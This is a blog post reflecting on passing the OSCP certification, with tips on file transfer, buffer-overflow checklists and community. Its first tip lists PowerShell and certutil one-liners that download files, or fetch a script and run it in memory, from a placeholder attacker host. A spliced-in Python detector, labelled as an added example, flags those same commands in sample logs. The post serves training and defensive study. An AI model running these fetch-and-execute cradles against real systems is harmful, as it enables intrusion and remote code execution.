OSCP - My Thoughts & Tips

Followed with profuse fist-pumping.

I recently earned my OSCP certification. So naturally I now have to be the 924348th person to share their experience about it (I also need an excuse to familiarise myself with Markdown).

Should I read this?

To preface, I'm steering clear of the standard recommendations. Much better articles on that already exist and this isn't my post on how to reinvent the wheel. If you're looking for a general purpose preparation guide then I highly recommend you check out TJNull's OSCP guide and list of OSCP-like machines.

Instead, I'll be sharing three hopefully less orthodox tips to help you through the OSCP, divulge my thoughts having completed the certification, and discuss what my next steps are.

Verdict?

Excellent. An amazing course with a lot to learn. OffSec's Try Harder motto is very evident in both the course's materials and training structure. I came into the OSCP quite prepared having completed eLearnSecurity's eJPT and eCPPT. Those two were very good in their own ways, but I definitely improved my pentesting skills the most by taking the OSCP.

Tips

1) Be comfortable transferring files between Kali and Windows

One thing I learned the hard way was that I wasn't very flexible with how I transferred files between Kali and Windows. I would rely solely on Nishang's Invoke-PowerShellTcp.ps1 and a single PowerShell command I had noted on my cheatsheet. Sometimes a PowerShell command just doesn't work. Hell, sometimes you need to embed PowerShell or CMD commands into a Python script. Here are some helpful one-liners I've had to use during the course. Add these to your command cheatsheet. Don't have one? See here for guidance.

PowerShell

I mean, it's still PowerShell... You're gonna have to be comfortable with it. Here are several commands I recommend you note down:

Download to a location - Use if you have a PowerShell session
IEX(New-Object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/ExampleFile.exe', 'C:\<FilePath>\ExampleFile.exe')

Download to a location - Use if you have a CMD Prompt session
echo IEX(New-Object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/ExampleFile.exe', 'C:\<FilePath>\ExampleFile.exe') | powershell -noprofile -

Download and run the chosen script in memory - Note this does not save anything to disk: the downloaded text is passed straight to IEX, so point it at a PowerShell script rather than a binary
echo IEX(New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/ExampleScript.ps1') | powershell -noprofile -

Download to a location - Use if you have a PowerShell session
invoke-webrequest -outfile ExampleFile.exe http://<IP>:<PORT>/ExampleFile.exe

Embedding PowerShell commands into a Python variable - The command itself is moot here; pay attention to the backslashes escaping the quotation marks that wrap the URL.
IEX(New-Object Net.WebClient).DownloadString(\'http://<IP>:<PORT>/ExampleFile.exe\')

Certutil

Remember when Living off the Land was trendy? Well if you didn't want to stop at PowerShell, might I introduce you to Certutil?

Certutil is a command-line binary pre-installed on Windows. Its intended purpose is to display, configure and verify certification authority information. However, it can also be used in a "wget"-like manner to download files from your Kali machine. With a Python SimpleHTTPServer running on Kali, you can run the command below to transfer files easily:

certutil -urlcache -split -f http://<IP>:<PORT>/ExampleFile.exe ExampleFile.exe
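Every transfer primitive in this section leaves a process command line behind, which is exactly what a blue team keys on. As an added example (not from the original post), here is a small Python detector run over a few constructed process-creation log lines: it flags certutil -urlcache downloads, WebClient DownloadString/DownloadFile cradles, Invoke-WebRequest -OutFile, and a script piped to powershell -noprofile - on stdin. The log format, IP addresses and file names are made up for the example.

```python
import re

# Constructed sample process-creation events (not real logs), one per line:
# "<time> <parent_image> -> <image> <command_line>"
SAMPLE_EVENTS = [
    "10:01:02 cmd.exe -> certutil.exe certutil -urlcache -split -f http://10.10.14.5:8000/ExampleFile.exe ExampleFile.exe",
    "10:01:10 cmd.exe -> powershell.exe powershell -noprofile -",
    "10:01:11 powershell.exe -> powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8000/x.ps1')",
    "10:02:00 explorer.exe -> certutil.exe certutil -verify -urlfetch cert.cer",
    "10:02:30 powershell.exe -> powershell.exe Invoke-WebRequest -OutFile update.exe https://vendor.example.com/update.exe",
    "10:03:00 explorer.exe -> notepad.exe notepad C:\\Users\\bob\\notes.txt",
]

# One case-insensitive pattern per transfer primitive discussed above.
# Invoke-WebRequest is a lower-fidelity signal: admins use it too, so
# treat that hit as context rather than an alert on its own.
RULES = {
    "certutil_urlcache_download": re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+https?://", re.I),
    "powershell_webclient_cradle": re.compile(r"New-Object\s+(System\.)?Net\.WebClient\)\.Download(String|File)\(", re.I),
    "powershell_invoke_webrequest": re.compile(r"(Invoke-WebRequest|iwr)\b.*-OutFile", re.I),
    "powershell_stdin_script": re.compile(r"powershell(\.exe)?\s.*-noprofile\s+-\s*$", re.I),
}

EVENT_RE = re.compile(r"^(?P<time>\S+)\s+(?P<parent>\S+)\s->\s(?P<image>\S+)\s(?P<cmdline>.*)$")


def parse_event(line):
    """Split one constructed log line into its fields; None if it does not parse."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def match_rules(cmdline):
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def detect(lines):
    """Return (time, image, [rule names]) for each event that triggers a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        names = match_rules(ev["cmdline"])
        if names:
            hits.append((ev["time"], ev["image"], names))
    return hits


if __name__ == "__main__":
    for when, image, names in detect(SAMPLE_EVENTS):
        print(when, image, ", ".join(names))
```

The benign certutil -verify line and the notepad line produce no hit, which is the point of keying on the -urlcache/-f pair rather than on certutil.exe alone.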

2) Have a Buffer Overflow Checklist

Yes, you absolutely should be running AutoRecon while working on your Buffer Overflow machine, but hopefully you already know that.

What you may not have, though, is a Buffer Overflow checklist. You want to go into your exam knowing that you already have 25 points. You deserve those extra few hours you'll have saved by having a checklist. And if you're like me and tunnel-vision a lot, you'll definitely need it when you're down a rabbit hole.


The checklist I wrote up is available here. I recommend you modify it in whatever way helps you nail your methodology.

3) Engage with the community

A lot of people are working on the OSCP, some much smarter than you and I. I found engaging with the community, discussing labs and learning how others approached machines really helped improve my own skillset. If there's only one takeaway from this post, it should be that you download Discord and join the following Discord servers:

I'd also recommend you subscribe to the OSCP subreddit here.

You'll find some prominent InfoSec individuals in those servers, notably OffSec staff, content creators, HTB ambassadors, and authors of well-regarded pentesting tools. They're great places to ask questions, chat about courses, take part in AMAs, compete in CTFs, and have a laugh.

Next steps?

This is a tough one I've been struggling with for the past few days. Having a structured goal to work towards really helps me focus. I'm weighing my options at the moment and they're a toss-up between the following:

  • Finally learn some Active Directory and work through HTB Pro Labs and Pentest Academy's certs.
  • Get better at Web App Security and start working through the Portswigger Academy labs.
  • Explore Cloud options on ACloud.Guru and elsewhere, particularly on DevSecOps.
  • OSCE BABY

I haven't fully decided yet and I also have eLearnSecurity's Exploit Development (xDS) course I need to complete. I'll be working on that while tackling some HTB machines before I fully commit to one of the above.

To wrap up, OSCP? 10/10 would recommend.

Elias


London, United Kingdom http://xaldin.io